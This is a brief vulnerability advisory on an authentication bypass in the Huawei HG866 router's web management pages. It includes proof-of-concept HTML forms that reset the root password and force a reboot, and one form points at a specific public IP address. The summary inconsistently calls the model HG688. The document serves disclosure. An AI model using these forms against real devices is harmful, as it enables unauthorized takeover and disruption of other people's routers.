Huawei HG866 authentication bypassHuawei HG866 authentication bypass
Summary
The web management interface of Huawei HG688 routers has several pages which fail to validate the user's session. This allows an attacker to bypass the authentication both locally and remotely.
Description
| Equipment ID: | EchoLife:HG866 |
| Hardware Version: | HG866GTA_VER.C, 01, 02 |
| Software Version: | V1R2C01SPC202, R3.2.4.92sbn - R3.4.2.257sbn, 3FE53864AOCB16 |
| Severity: | High |
| Impact: | Authentication Bypass |
| Attack vector: | Remote |
| Solution: | N/A |
| Reference: | N/A |
The Huawei HG866 router comes with a web management interface, ports 4FE+2POTS+WIFI+2USB, optical interface GPON, SC/APC.
The administrative web interface has pages that fail to validate the user's session, which allows the authentication to be bypassed both locally and remotely.
Due to the lack of session validation, it is possible to change the administrator's password by sending a POST request to the URL: /html/password.html.
POC
<!--Change root password to password --!> <form name=hg866bypass action=http://187.162.144.50/html/password.html method=post > <input name=psw value=password ><input name=reenterpsw value=password > <input type="submit" name="save" value="Apply" /> </form> <!--Reboot the device --!> <form name=hg866dos action=http://192.168.100.251/html/admin_reboot.html" method="post"> <input type=submit name=save id=save value=Reboot /> </form>
Pedro Joaquín
[email protected]
YOUTUBE
TWITTER
FACEBOOK
BLOG
EMAIL US